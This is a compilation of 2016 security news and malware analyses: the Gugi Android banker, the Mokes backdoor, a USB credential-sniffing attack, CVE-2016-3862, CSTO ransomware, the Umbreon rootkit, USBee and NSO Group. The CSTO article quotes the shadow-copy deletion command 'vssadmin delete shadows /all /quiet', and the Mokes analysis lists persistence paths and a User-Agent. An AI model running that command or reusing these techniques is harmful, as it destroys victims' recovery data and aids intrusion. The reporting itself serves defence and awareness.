Almost every Android OS update includes new security features designed to make cybercriminals’ life harder. And, of course, the cybercriminals always try to bypass them.

We have found a new modification of the mobile banking Trojan, Trojan-Banker.AndroidOS.Gugi.c that can bypass two new security features added in Android 6: permission-based app overlays and a dynamic permission requirement for dangerous in-app activities such as SMS or calls. The modification does not use any vulnerabilities, just social engineering.

Initial infection

The Gugi Trojan is spread mainly by SMS spam that takes users to phishing webpages with the text “Dear user, you receive MMS-photo! You can look at it by clicking on the following link”.

Banking Trojan, Gugi, evolves to bypass Android 6 protection

Clicking on the link initiates the download of the Gugi Trojan onto the user’s Android device.

Circumventing the security features

To help protect users from the impact of phishing and ransomware attacks, Android 6 introduced a requirement for apps to request permission to superimpose their windows/views over other apps. In earlier versions of the OS they were able to automatically overlay other apps.

The Trojan’s ultimate goal is to overlay banking apps with phishing windows in order to steal user credentials for mobile banking. It also overlays the Google Play Store app to steal credit card details.

The Trojan-Banker.AndroidOS.Gugi.c modification gets the overlay permission it needs by forcing users to grant this permission. It then uses that to block the screen while demanding ever more dangerous access.

The first thing an infected user is presented with is a window with the text “Additional rights needed to work with graphics and windows” and one button: “provide.”

Banking Trojan, Gugi, evolves to bypass Android 6 protection

After clicking on this button, the user will see a dialog box that authorizes the app overlay (“drawing over other apps”).

Banking Trojan, Gugi, evolves to bypass Android 6 protection

System request to permit Trojan-Banker.AndroidOS.Gugi.c to overlay other apps

But as soon as the user gives Gugi this permission, the Trojan will block the device and show its window over any other windows/dialogs.

Banking Trojan, Gugi, evolves to bypass Android 6 protection

Trojan-Banker.AndroidOS.Gugi.c window that blocks the infected device until it receives all the necessary rights

It gives the user no option, presenting a window that contains only one button: “Activate”. Once the user presses this button they will receive a continuous series of requests for all the rights the Trojan is looking for. They won’t get back to the main menu until they have agreed to everything.

For example, following the first click of the button, the Trojan will ask for Device Administrator rights. It needs this for self-defense because it makes it much harder for the user to uninstall the app.

Banking Trojan, Gugi, evolves to bypass Android 6 protection

After successfully becoming the Device Administrator, the Trojan produces the next request. This one asks the user for permission to send and view SMS and to make calls.

It is interesting that Android 6 has introduced dynamic request capability as a new security features

Earlier versions of the OS only show app permissions at installation; but, starting from Android 6, the system will ask users for permission to execute dangerous actions like sending SMS or making calls the first time they are attempted, or allows apps to ask at any other time – so that is what the modified Gugi Trojan does.

Banking Trojan, Gugi, evolves to bypass Android 6 protection

TSystem request for dynamic permission

The Trojan will continue to ask the user for each permission until they agree. Should the user deny permission, subsequent requests will offer them the option of closing the request. If the Trojan does not receive all the permissions it wants, it will completely block the infected device. In such a case the user’s only option is to reboot the device in safe mode and try to uninstall the Trojan.

Banking Trojan, Gugi, evolves to bypass Android 6 protection

TRepeating system request for dynamic permission

A standard banking Trojan

With the exception of its ability to bypass Android 6 security features, and its use of the Websocket protocol, Gugi is a typical banking Trojan. It overlays apps with phishing windows to steal credentials for mobile banking or credit card details. It also steals SMS, contacts, makes USSD requests and can send SMS by command from the CnC.

The Trojan-Banker.AndroidOS.Gugi family has been known about since December 2015, with the modification Trojan-Banker.AndroidOS.Gugi.c first discovered in June 2016.

Victim profile

The Gugi Trojan mainly attacks users in Russia: more than 93% of attacked users to date are based in that country. Right now it is a trending Trojan – in the first half of August 2016 there were ten times as many victims as in April 2016.

Banking Trojan, Gugi, evolves to bypass Android 6 protection

TUnique number users attacked by Trojan-Banker.AndroidOS.Gugi.

We will shortly be publishing a detailed report into the Trojan-Banker.AndroidOS.Gugi malware family, its functionality and its use of the Websocket protocol.

All Kaspersky Lab products detect all modifications of the Trojan-Banker.AndroidOS.Gugi malware family.

Warning! This Cross-Platform Malware Can Hack Windows, Linux and OS X Computers
8.9.2016 thehackernews Virus
Unlike specially crafted malware specifically developed to take advantage of Windows operating system platform, cyber attackers have started creating cross-platform malware for wider exploitation.
Due to the rise in popularity of Mac OS X and other Windows desktop alternatives, hackers have begun designing cross-platform malware modularly for wide distribution.
Cross-platform malware is loaded with specialized payloads and components, allowing it to run on multiple platforms.
One such malware family has recently been discovered by researchers at Kaspersky Lab, which run on all the key operating systems, including Windows, Linux, and Mac OS X.
Stefan Ortloff, a researcher from Kaspersky Lab’s Global Research and Analysis Team, first discovered the Linux and Windows variants of this family of cross-platform backdoor, dubbed Mokes, in January this year.
Now, the researcher today confirmed the existence of an OS X variant of this malware family, explaining a technical breakdown of the backdoor in a post on Securelist.
Alike the Linux and Windows variants, the OS X backdoor variant, Backdoor.OSX.Mokes.a, specializes in capturing audio-video, obtaining keystrokes as well as taking screenshots every 30 seconds from a victim’s machine.
The variant is written in C++ using Qt, a cross-platform application framework that is widely being used for developing applications to run on various software and hardware platforms.
The backdoor also has the capability to monitor removable storage like when a USB drive is connected to or removed from the computer.
It can also scan the file system for Office documents, including .docx, .doc, .xlsx, and .xls files.
The OS X backdoor can also execute arbitrary commands on the victim’s computer from its command and control (C&C) server.
The backdoor establishes an encrypted connection with its command and control server and communicates using AES-256 encryption, which is considered to be a secure encryption algorithm.
Ortloff notes, right after execution, the OS X sample he analyzed copies itself to a handful of locations, including caches that belong to Skype, Dropbox, Google, and Firefox. This behavior is similar to the Linux variant that copied itself to locations belonging to Dropbox and Firefox after execution.
The researcher has not attributed the Mokes backdoor family to any hacking group, state-sponsored hacker or country, nor he detailed about the OS X backdoor’s infection vector and how widespread it is.
However, based on the currently available information, the backdoor seems to be a sophisticated piece of malware.

Cross-platform Mokes backdoor OS X exists and is spreading in the wild
8.9.2016 securityaffairs Vulnerebility

Malware researchers from Kaspersky Lab confirmed the existence of an OS X variant of the Mokes backdoor discovered in January by Kaspersky.
Malware researchers from Kaspersky Lab confirmed the existence of an OS X variant of a recently discovered family of cross-platform backdoors. The backdoors family was named Mokes and a strain of malware was first spotted in January, but its existence was confirmed only this week.

“Back in January this year we found a new family of cross-platform backdoors for desktop environments. After the discovery of the binaries for Linux and Windows systems, we have now finally come across the OS X version of Mokes.A. It is written in C++ using Qt, a cross-platform application framework, and is statically linked to OpenSSL. This leads to a filesize of approx.” wrote Kaspersky.

The malicious code is able to steal various kinds of data from an infected system, including screenshots, Office-Documents (docx, .doc, .xlsx, and .xls files), Keystrokes, and Audio-/Video-Captures.

The Mokes backdoor also allows hackers to execute arbitrary commands on the victim’s computer, it works on Linux, Windows and also OS X.

The sample of OS X Mokes backdoor recently analyzed by Kaspersky was unpacked, but researchers believe it’s packed as the Linux variant spotted in January.

Once executed, the Mokes backdoor copies itself to a handful of locations, choosing the first available in the following locations:

$HOME/Library/App Store/storeuserd
After the malware establish a first connection with its C&C server using HTTP on TCP port 80, the backdoor communicates via TCP port 443.

The researchers discovered that the User-Agent string is hardcoded in the binary, once the server receive it, it replies with “text/html” content of 208 bytes in length. Then the encrypted connection is established using the AES-256-CBC algorithm.


The strange things that characterized the story is that despite the malware researchers spotted the first samples of backdoor in January, the number of infections samples did not increase.

Stefan Ortloff, the researcher with Kaspersky Lab’s Global Research and Analysis Team which identified the family of Mokes backdoor hasn’t provided details on the infection vector.

The report published by Kaspersky also includes the IoC for the detection of the backdoor.

Here’s How to Hack Windows/Mac OS X Login Password (When Locked)
7.9.2016 thehackernews Hacking
A Security researcher has discovered a unique attack method that can be used to steal credentials from a locked computer (but, logged-in) and works on both Windows as well as Mac OS X systems.
In his blog post published today, security expert Rob Fuller demonstrated and explained how to exploit a USB SoC-based device to turn it into a credential-sniffer that works even on a locked computer or laptop.
Fuller modified the firmware code of USB dongle in such a way that when it is plugged into an Ethernet adapter, the plug-and-play USB device installs and acts itself as the network gateway, DNS server, and Web Proxy Auto-discovery Protocol (WPAD) server for the victim's machine.
The attack is possible because most PCs automatically install Plug-and-Play USB devices, meaning "even if a system is locked out, the device [dongle] still gets installed," Fuller explains in his blog post.
"Now, I believe there are restrictions on what types of devices are allowed to install at a locked out state on newer operating systems (Win10/El Capitan), but Ethernet/LAN is definitely on the white list."
How does the Attack Work?
You might be wondering: Why your computer automatically share Windows credentials with any connected device?
That is because of the default behavior of Microsoft Window’s name resolution services, which can be abused to steal authentication credentials.
The modified plug-and-play USB Ethernet adapter includes a piece of software, i.e. Responder, which spoofs the network to intercept hashed credentials and then stored them in an SQLite database.
The hashed credentials collected by the network exploitation tool can later be easily brute-forced to get clear text passwords.
Apparently, to conduct this attack, attackers would require physical access to a target computer, so that they can plug in the evil USB Ethernet adapter. However, Fuller says the average time required for a successful attack is just 13 seconds.
You can watch the video demonstration below that shows Fuller's attack in action.

Fuller successfully tested his attack against Windows 98 SE, Windows 2000 SP4, Windows XP SP3, Windows 7 SP1, Windows 10 Enterprise and Home (but not Windows 8), as well as OS X El Capitan and OS X Mavericks. He’s also planning to test it against several Linux distros.
Fuller tested the attack with two USB Ethernet dongles: the USB Armory and the Hak5 Turtle. For more detailed explanation, you can head on to his blog post.

CVE-2016-3862 flaw – Silently hack millions Androids devices with a photo
7.9.2016 securityaffairs Vulnerebility

The CVE-2016-3862 flaw is a remote code execution vulnerability that affects the way images used by certain Android apps parsed the Exif data.
Are you an Android user? I have a bad news for you, an apparently harmless image on social media or messaging app could compromise your mobile device.
The last security updates issued by Google have fixed the Quadrooter vulnerabilities, that were threatening more than 900 Million devices, and a critical zero-day that could let attackers deliver their hack hidden inside an image.

The flaw, coded as CVE-2016-3862, is a remote code execution vulnerability in the Mediaserver. It affects the way images used by certain Android applications parsed the Exif data included in the images.

“Exchangeable image file format (officially Exif, according to JEIDA/JEITA/CIPA specifications) is a standard that specifies the formats for images, sound, and ancillary tags used by digital cameras (includingsmartphones), scanners and other systems handling image and sound files recorded by digital cameras. ” reads Wikipedia.

The flaw was first discovered by the security researcher Tim Strazzere from the SentinelOne firm, who explained that it could be exploited by hackers to take complete control of the device without the victim knowing or crash it.

“Strazzere told me that as long as an attacker can get a user to open the image file within an affected app – such as Gchat and Gmail – they could either cause a crash or get “remote code execution”; ergo they could effectively place malware on the device and take control of it without the user knowing.” explained Forbes.

The victim doesn’t need to click on the malicious image, neither on a link, because as soon as it’s data was parsed by the device it would trigger the CVE-2016-3862 vulnerability.

“The problem was made even more severe as a malicious hacker wouldn’t even need the victim to do anything. “Since the bug is triggered without much user interaction – an application only needs to load an image a specific way – triggering the bug is as simple as receiving a message or email from someone. Once that application attempts to parse the image (which was done automatically), the crash is triggered,” Strazzere explained.

What does it mean?

Just one photo containing a generic exploit can silently hack millions of Android devices, is a way similar to the Stagefright exploits that allowed the attackers to hack a smartphone with just a simple text message.

“Theoretically, someone could create a generic exploit inside an image to exploits lots of devices. However, due to my skill level, I had to specifically craft each one for the devices. Though once this is done, Gchat, Gmail, most other messengers or social media apps would likely allow this to trigger.”

Strazzere developed the exploits for the affected devices and tested them on Gchat, Gmail and many other messenger and social media apps.

Strazzere did not reveal the names of the other apps that are also affected by the CVE-2016-3862 vulnerability, it also added that the list of vulnerable software includes “privacy-sensitive” tools. Any mobile app implementing the Android Java object ExifInterface code is likely vulnerable to the vulnerability.

CVE-2016-3862 android flaw

The vulnerability is similar to last year’s Stagefright bug (exploit code) that allowed hackers to hijack Android devices with just a simple text message without the owners being aware of it.

Google Android version from 4.4.4 to 6.0.1 are affected by the CVE-2016-3862 vulnerability, of course, the devices that installed the last update.

Google has already delivered a patch to fix the vulnerability, as usual, this doesn’t mean that your mobile has already applied it because the patch management depends on handset manufacturers and carriers.

So, if you are not running an updated version of the Android OS, you probably are vulnerable to the image-based attack.

Google rewarded Strazzere $4,000 as part of its Android bug bounty and added another $4,000, as the researcher had pledged to give all $8,000 to Girls Garage, a program of the nonprofit Project H Design for girls aged 9-13.

The Missing Piece – Sophisticated OS X Backdoor Discovered
7.9.2016 Kaspersky Vulnerebility

Backdoor.OSX.Mokes.a is the most recently discovered OS X variant of a cross-platform backdoor which is able to operate on all major operating systems (Windows,Linux,OS X). Please see also our analysis on the Windows and Linux variants.
This malware family is able to steal various types of data from the victim’s machine (Screenshots, Audio-/Video-Captures, Office-Documents, Keystrokes)
The backdoor is also able to execute arbitrary commands on the victim’s computer
To communicate it’s using strong AES-256-CBC encryption

Back in January this year we found a new family of cross-platform backdoors for desktop environments. After the discovery of the binaries for Linux and Windows systems, we have now finally come across the OS X version of Mokes.A. It is written in C++ using Qt, a cross-platform application framework, and is statically linked to OpenSSL. This leads to a filesize of approx. 14MB. Let’s have a look into this very fresh sample.

“Unpacked” Backdoor.OSX.Mokes.a

Its filename was “unpacked” when we got our hands on it, but we’re assuming that in-the-wild it comes packed, just like its Linux variant.

Backdoor.OSX.Mokes.a Mach-O x86_64 file type


When executed for the first time, the malware copies itself to the first available of the following locations, in this order:

$HOME/Library/App Store/storeuserd
Corresponding to that location, it creates a plist-file to achieve persistence on the system:

Backdoor.OSX.Mokes.a Persistence plist file

After that it’s time to establish a first connection with its C&C server using HTTP on TCP port 80:

Backdoor.OSX.Mokes.a HTTP Connection dump

The User-Agent string is hardcoded in the binary and the server replies to this “heartbeat” request with “text/html” content of 208 bytes in length. Then the binary establishes an encrypted connection on TCP port 443 using the AES-256-CBC algorithm.

Backdoor.OSX.Mokes.a IDA screenshot _AES_set_encrypt_key

Backdoor functionality

Its next task is to setup the backdoor features:

Backdoor.OSX.Mokes.a IDA screenshot EKomsUserActivity Methods

Capturing Audio
Backdoor.Mokes.a IDA screenshot AudioCaptureSession methods

Monitoring Removable Storage
Backdoor.OSX.Mokes.a IDA screenshot AbRemovableStorageMonitorService Methods

Capturing Screen (every 30 sec.)
Backdoor.OSX.Mokes.a IDA  screenshot AbScreenCapture start

Scanning the file system for Office documents (xls, xlsx, doc, docx)
Backdoor.OSX.Mokes.a IDA screenshot hexdump office file filters

The attacker controlling the C&C server is also able to define own file filters to enhance the monitoring of the file system as well as executing arbitrary commands on the system.

Just like on other platforms, the malware creates several temporary files containing the collected data if the C&C server is not available.

$TMPDIR/ss0-DDMMyy-HHmmss-nnn.sst (Screenshots)
$TMPDIR/aa0-DDMMyy-HHmmss-nnn.aat (Audiocaptures)
$TMPDIR/kk0-DDMMyy-HHmmss-nnn.kkt (Keylogs)
$TMPDIR/dd0-DDMMyy-HHmmss-nnn.ddt (Arbitrary Data)
DDMMyy = date: 070916 = 2016-09-07
HHmmss = time: 154411 = 15:44:11
nnn = milliseconds

If the environment variable $TMPDIR is not defined, “/tmp/” is used as the location (http://doc.qt.io/qt-4.8/qdir.html#tempPath).

Hints from the author

The author of this malware again left some references to the corresponding source files:

Backdoor.OSX.Mokes.a IDA screenshot Source file references


We detect this type of malware as HEUR:Backdoor.OSX.Mokes.a



$HOME/LibraryApp Store/storeuserd


Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A

Russia's Largest Portal HACKED; Nearly 100 Million Plaintext Passwords Leaked
7.9.2016 thehackernews Hacking
Russia's Largest Portal HACKED; Nearly 100 Million Plaintext Passwords Leaked
Another data breach from 2012, and this time, it's Russia's biggest internet portal and email provider Rambler.ru.
Rambler.ru, also known as Russia's Yahoo, suffered a massive data breach in 2012 in which an unknown hacker or a group of hackers managed to steal nearly 100 Million user accounts, including their unencrypted plaintext passwords.
The copy of the hacked database obtained by the breach notification website LeakedSource contained details of 98,167,935 Rambler.ru users that were originally stolen on 17 February 2012, but went unreported.
The leaked user records in the database included usernames, email addresses, ICQ numbers (IM chat service), social account details, passwords and some internal data, the data breach indexing site said in a blog post.
The data breach was reported by the same hacker using the daykalif@xmpp.jp Jabber ID who handed LeakedSource over 43.5 Million user records from another 2012 hack suffered by the Last.fm music streaming service.
According to LeakedSource, none of the passwords were hashed, meaning the company stored its user's password in an unencrypted plain text format that could allow the company as well as hackers to see passwords easily.
This is something similar to the VK.com breach, in which 171 Million users’ accounts were taken from the Russian social networking site, where passwords were also stored in plaintext format, without any hashing or salting.
Again, as expected, the most common passwords used by Rambler.ru users, includes "asdasd," "123456," "000000," "654321," "123321," or "123123."
LeakedSource has added the data into its database; so Rambler.ru users can check if they have been compromised by searching their account at Leaked Source’s search engine.
Rambler.ru is the latest victim to join the list of "Mega-Breaches" revealed in recent months, when hundreds of Millions of online credentials from years-old data breaches on popular services, including LinkedIn, MySpace, VK.com, Tumblr, and Dropbox, were exposed online.
Rambler has yet to respond to the incident.
The Bottom Line:
Users are advised to change their passwords for Rambler.ru account as well as other online accounts immediately, especially those using the same passwords.
Moreover, I always encourage users to make use of password managers that create strong and complex passwords for different websites as well as remember them on your behalf.
I have listed some of the best password managers that could help you understand the importance of password manager as well as choose one according to your requirement.

Warning! Just an Image Can Hack Your Android Phone — Patch Now
7.9.2016 thehackernews  Apple
Own an Android smartphone? Beware, as just an innocuous-looking image on social media or messaging app could compromise your smartphone.
Along with the dangerous Quadrooter vulnerabilities that affected 900 Million devices and other previously disclosed issues, Google has patched a previously-unknown critical bug that could let attackers deliver their hack hidden inside an innocent looking image via social media or chat apps.
In fact, there is no need for a victim to click on the malicious photo because as soon as the image’s data was parsed by the phone, it would quietly allow a remote attacker to take control over the device or simply crash it.
The vulnerability is similar to last year's Stagefright bug (exploit code) that allowed hackers to hijack Android devices with just a simple text message without the owners being aware of it.
The Stagefright flaw affected more than 950 Million Android devices and resided in the core Android component Stagefright — a multimedia playback library used by Android to process, record and play multimedia files.
However, the recent vulnerability (CVE-2016-3862) resided in the way images used by certain Android applications parsed the Exif data in an image, SentinelOne's Tim Strazzere, the researcher who uncovered the vulnerability, told Forbes.
Any app using Android's Java object ExifInterface code is likely vulnerable to the issue.
An Image Received...? Your Game is Over
Making a victim open the image file within an affected app like Gchat or Gmail, a hacker could either cause a victim's phone to crash or remotely execute malicious code to inject malware on the phone and take control of it without victim’s knowledge.
"Since the bug is triggered without much user interaction – an application only needs to load an image a specific way – triggering the bug is as simple as receiving a message or email from someone," Strazzere said. "Once that application attempts to parse the image (which was done automatically), the crash is triggered."
According to Strazzere, attackers could develop a simple exploit inside an image to target a large number of vulnerable Android devices.
Strazzere crafted exploits for the affected devices and found that it worked on Gchat, Gmail and most other messenger and social media apps, though he did not disclose the names of the other non-Google apps affected by the flaw.
When will I expect a Fix?
All versions of Google's operating system from Android 4.4.4 to 6.0.1 are vulnerable to the image-based hack, except today's update that fixed the vulnerability.
The researcher even successfully tested his exploits on a handful of phones running Android 4.2 and Amazon devices and found that the devices remain unpatched, leaving a large number of users of older Android devices exposed.
So, if you are not running an updated version of operating system and/or device, you probably are vulnerable to the image-based attack.
Google has delivered a patch to fix the issue, but given the shaky history of handset manufacturers and carriers rolling out security patches, it is not known how long the companies will take to update vulnerable Android devices.
Google rewarded Strazzere with $8,000 as part of the company's Android bug bounty program.

CSTO Ransomware, a malware that uses UDP and Google Maps

7.9.2016 securityaffairs Virus

CSTO ransomware it is able to query the Google Maps API to discover the victim’s location and connects to the C&C via UDP.
Ransomware is considered by the security experts one of the most dangerous threats to Internet users and organizations across the world.

Malware authors are developing new malicious codes that implement new features to improve evasion and spreading abilities.

Security researchers at BleepingComputer have reported a new ransomware dubbed Cry or CSTO because it pretends to come from the inexistent organization Central Security Treatment Organization.

The CSTO ransomware was first spotted by the malware researcher MalwareHunterTeam.

Once infected a machine the CSTO ransomware encrypts files and append the .cry extension to them. Like the Cerber ransomware, also the CSTO sends information to its command and control server via UDP.

After infecting a computer, the CSTO ransomware collects information on the host (Windows version, installed service pack, OS version, username, computer name, and CPU type) that sends via UDP to 4096 different IP addresses, but only one of them is the C&C server.

The Vxers have chosen the UDP protocol in an attempt to hide the location of the C&C server.

The threat requests the payment of a 1.1 Bitcoins (more than $600) ransom in order to decrypt the files.

The CSTO ransomware implements a singular feature, it leverages websites such as Imgur.com and Pastee.org to host information about victims, it is able to query the Google Maps API to discover the victim’s location using SSIDs of nearby wireless networks .

The ransomware uses the WlanGetNetworkBssList function to get the nearby SSIDs, in this way it is able to determine the victim’s location, but it is not clear how the malware uses this information.

“Furthermore, it will also use public sites such as Imgur.com and Pastee.org to host information about each of the victims. Last, but not least, it will query the Google Maps API to determine the victim’s location using nearby wireless SSIDs.” reported bleepingcomputer.com.

CSTO ransomware

The threat encrypts the file, it uploads host information along with a list of encrypted files to Imgur.com by compiling all details in a fake PNG image file and sending it to a certain album.

Imgur, in turn, assigns a unique name for the image file and notifies it to the CSTO ransomware and then broadcasts the filename over UDP to inform the C&C server.

Similar to other ransomware, the Cry ransomware deletes the Shadow Volume Copies using the command vssadmin delete shadows /all /quiet. In this way it prevents victims from restoring the encrypted files.

The threat gains the persistency by creating a randomly named scheduled task that is triggered every time the user logs into Windows. The task also drops ransom notes on the desktop of the infected machine.

The ransom note includes instructions on how to access the Tor network to reach the payment site used by the authors.

“The ransom notes created by the Central Security Treatment Organization Ransomware contain links to a TOR payment site that has a Window title of User Cabinet. When a user visits this site, they will be prompted to login using the personal code from their ransom note.” continues bleepingcomputer.com.

The payment site includes a support page and offers victims the possibility to decryption just one file for free as proof that it is possible to decrypt all the locked files.

The researchers tested the free decryption feature, but it failed, another good reason to avoid paying the ransom.

Pokemon-fan VXer developed the Linux Umbreon rootkit
6.9.2016 securityaffairs Virus

Security researchers from TrendMicro have published an interesting analysis on the Linux Umbreon rootkit, a new malware developed by a Pokemon-fan VXer.
Malware researchers from TrendMicro have obtained samples of a new strain of Linux rootkit from one of its trusted partners.

The new rootkit family was called Umbreon (ELF_UMBREON family), from the name of one of the Pokémon characters. It targets Linux systems, including embedded devices and any other system running both Intel and ARM processors

According to the experts, the Umbreon Rootkit was developed Umbreon in early 2015 by a VXer that has been active in the cybercriminal underground since at least 2013. It has been claimed in the criminal underground forums that Umbreon is very effective in evading the detection.

“Rootkits are persistent threats intended to be hard to detect/observe. Its main purpose is to keep itself (and other malware threats) stealthed and totally hidden from administrators, analysts, users, scanning, forensic, and system tools.” Trend Micro senior threat researcher Fernando Mercês says. “They may also open a backdoor and/or use a C&C server and provide an attacker ways to control and spy on the affected machine.”

Umbreon is classified as a ring 3 rootkit (or usermode rootkit) because it works on User mode (ring 3), this means it does not install kernel objects onto the system, but hooks functions from core libraries that are used by various applications as an intermediary level to system calls.

“[Umbreon] hooks functions from core libraries that are used by programs as interfaces to system calls that run important operations in a system such as reading/writing files, spawning processes, or sending packets over the network. It is perfectly possible to spy on and change the way things are done within an operating system, even from user mode.”

Once compromised the targeted system, the rootkit creates a valid Linux user that could be used by attackers to access it via any authentication method supported by Linux via pluggable authentication modules (PAMs), including SSH.

umbreon rootkit

The researchers from TrendMicro focused their analysis on the Espeon backdoor component, a non-promiscuous libpcap-based backdoor written in C that spawns a shell when an authenticated user connects to it. (The attackers also named this component after a Pokémon –

Once again, the author used the name of a Pokémon for its components. Espeon allows an attacker to establish a connection to its machine, working as a reverse shell to bypass firewalls.

Espeon is able to capture all the traffic from the Ethernet interface of the infected machine.

In order to remove the Umbreon Rootkit from the infected systems it is possible to use a Linux Live CD and follow the steps:

Mount the partition where the /usr directory is located; write privileges are required.
Backup all the files before making any changes.
Remove the file /etc/ld.so.<random>.
Remove the directory /usr/lib/libc.so.<random>.
Restore the attributes of the files /usr/share/libc.so.<random>.<arch>.*.so and remove them as well.
Patch the loader library to use /etc/ld.so.preload again.
Unmount the partition and reboot the system normally.
The procedure is feasible because the Umbreon is a ring 3 (user level) rootkit.

In order to detect the Umbreon Rootkit it is possible to use the YARA rules published by TrendMicro.

This Malware Can Transfer Data via USB Emissions from Air-Gapped Computers
6.9.2016 thehackernews Virus
Air-gapped computers that are isolated from the Internet or other networks and believed to be the most secure computers on the planet have become a regular target in recent years.
A team of researchers from Ben-Gurion University in Israel has discovered a way to extract sensitive information from air-gapped computers – this time using radio frequency transmissions from USB connectors without any need of specialized hardware mounted on the USB.
Dubbed USBee, the attack is a significant improvement over the NSA-made USB exfiltrator called CottonMouth that was mentioned in a document leaked by former NSA employee Edward Snowden.
Unlike CottonMouth, USBee doesn't require an attacker to smuggle a modified USB device into the facility housing the air-gapped computer being targeted; rather the technique turns USB devices already inside the facility into an RF transmitter with no hardware modification
Moreover, USBee does not involve any implant in USB firmware and drivers to execute the attack.
"We introduce a software-only method for short-range data exfiltration using electromagnetic emissions from a USB dongle," researchers wrote in a research paper published Monday. "Unlike other methods, our method doesn't require any [RF] transmitting hardware since it uses the USB's internal data bus."
The researchers stress the attack method of USBee is solely based on software, though it has to met certain conditions to execute. They are:
The protected computer must be infected with the malware, most probably, with the help of an insider.
Any USB device must be plugged into that infected air-gapped computer.
The attacker has to be near the compromised device, usually at maximum 3-5 meters.
USBee turns the targeted computer's USB ports into mini Radio Frequency (RF) transmitters by modulating the data fed at high-speed to plugged-in devices.
USBee will then send a string of '0' bits to a USB port in such a way that makes the device generate detectable emissions between 240MHz and 480MHz frequencies, according to Mordechai Guri, one of the researchers.
Now, by writing sequences of '0' and '1', attackers can generate a carrier wave from the rapid voltage changes and then use binary frequency shift keying (B-FSK) to encode useful data.
Since the attack is meant to steal binary data, attackers wouldn’t be able to steal any large files, but could get their hands on keys, passwords, and other small bits of sensitive data stored on the targeted computer.
Also Read: How NSA successfully Broke Trillions of Encrypted Connections.
USBee transmits data at about 80 bytes per second, which is fast enough to steal a 4096-bit decryption key in less 10 seconds.

The USBee malware offers ranges of around 9 feet when data is beamed over a USB thumb drive to 26 feet when the USB device uses a short cable that acts as a transmitting antenna.
The researchers' attack method sounds really impressive, but it's still a theoretical attack that can be deployed in real-world scenarios and be effective.
It's not the first time the researchers at Ben-Gurion came up with the technique to target air-gapped computers. Their previous research of hacking air gap computers include:
DiskFiltration attack that can steal data using sound signals emitted from the hard disk drive (HDD) of the targeted air-gapped computer;
BitWhisper that relies on heat exchange between two computer systems to stealthily siphon passwords or security keys;
AirHopper that turns a computer's video card into an FM transmitter to capture keystrokes;
Fansmitter technique that uses noise emitted by a computer fan to transmit data; and
GSMem attack that relies on cellular frequencies.
You can watch a short video of the recent attack given above, while more details can be found in the paper [PDF] titled, 'USBee: Air-Gap Covert-Channel via Electromagnetic Emission from USB.'

NSO Group, the surveillance firm that could spy on every smartphone
6.9.2016 securityaffairs BigBrothers

The NSO Group is one of the surveillance companies that allow their clients to spy on their targets through almost any smartphone.
It is quite easy for any Government to spy on mobile users, recently we have discussed the Trident vulnerabilities that were exploited by a surveillance software developed by the NSO Group to deliver the Pegasus malware.

But it could be very expensive if you decide to use the NSO Group’s software, according to The New York Times spy on 10 iPhones will cost $650,000, plus a $500,000 setup fee.

“To spy on 10 iPhone users, NSO charges government agencies $650,000; $650,000 for 10 Android users; $500,000 for five BlackBerry users; or $300,000 for five Symbian users — on top of the setup fee, according to one commercial proposal.” reported The New York Times. “You can pay for more targets. One hundred additional targets will cost $800,000, 50 extra targets cost $500,000, 20 extra will cost $250,000 and 10 extra costs $150,000, according to an NSO Group commercial proposal. There is an annual system maintenance fee of 17 percent of the total price every year thereafter.”

There are several companies that develop surveillance platforms for targeting mobile devices, the NSO Group operated in the dark for several years, until the researchers from the Citizenlab organization and the Lookout firm spotted its software in targeted attacks against UAE human rights defender, Ahmed Mansoor.

The researchers also spotted other attacks against a Mexican journalist who reported to the public a story of the corruption in the Mexican government.

“The company’s internal documents detail pitches to countries throughout Europe and multimillion-dollar contracts with Mexico, which paid the NSO Group more than $15 million for three projects over three years, according to internal NSO Group emails dated in 2013.” added The New York Times.

NSO Group

“Our intelligence systems are subject to Mexico’s relevant legislation and have legal authorization,” Ricardo Alday, a spokesman for the Mexican embassy in Washington, said in an emailed statement. “They are not used against journalists or activists. All contracts with the federal government are done in accordance with the law.”

The New York Times has conducted further investigations on the NSO Group, the company that specializes its offer in surveillance applications for governments and law enforcement agencies around the world.

People familiar with the NSO Group confirmed that the company has an internal ethics committee that monitors the sales and potential customers verifying that the software will not be abused to violate human rights.

Officially the sale of surveillance software is limited to authorized governments to support investigation of agencies on criminal organization and terrorist groups.

Unfortunately, its software is known to have been abused to spy on journalists and human rights activists.

“There’s no check on this,” said Bill Marczak, a senior fellow at the Citizen Lab at the University of Toronto’s Munk School of Global Affairs. “Once NSO’s systems are sold, governments can essentially use them however they want. NSO can say they’re trying to make the world a safer place, but they are also making the world a more surveilled place.”

Companies like the NSO Group operate in the dark, in a sort of “legal gray area,” despite the Israeli government exercises strict control of the export of such kind of software, surveillance applications could be abused by threat actors and authoritarian regimes worldwide.

The principal product of the NSO Group is a surveillance software called Pegasus, it allows to spy on the most common mobile devices, including iPhones, Androids, and BlackBerry and Symbian systems.

Pegasus is a perfect tool for surveillance, it is able to steal any kind of data from smartphones and use them to spy on the surrounding environment through their camera and microphone.

“In its commercial proposals, the NSO Group asserts that its tracking software and hardware can install itself in any number of ways, including “over the air stealth installation,” tailored text messages and emails, through public Wi-Fi hot spots rigged to secretly install NSO Group software, or the old-fashioned way, by spies in person.” continues The New York Times.

Now we have more information about the mysterious NSO Group, but many other companies operate in the same “legal gray area.”

Linux/Mirai ELF, when malware is recycled could be still dangerous
6.9.2016 securityaffairs Virus

Experts from MalwareMustDie spotted a new ELF trojan backdoor, dubbed ELF Linux/Mirai, which is now targeting IoT devices.
Experts from MalwareMustDie have analyzed in August samples of a particular ELF trojan backdoor, dubbed ELF Linux/Mirai, which is now targeting IoT devices. The name of the malware is the same of the binary,”mirai.*,” and according to the experts, several attacks have been detected in the wild.

The ELF Linux/Mirai is very insidious; it is still undetected by many antivirus solutions as confirmed by the very low detection ratio in the VirusTotal online scanning service.

“The reason for the lack of detection is because of the lack of samples, which are difficult to fetch from the infected IoT devices, routers, DVR or WebIP Camera, the Linux with Busybox binary in embedded platform, which what this threat is aiming.” states the analysis from MalwareMustDie Blog.

The last ELF examined by Security Affairs was the Linux Trojan Linux.PNScan that has actively targeting routers based on x86 Linux in an attempt to install backdoors on them.

But MalwareMustDie tells us that Linux/Mirai “is a lot bigger than PnScan”.

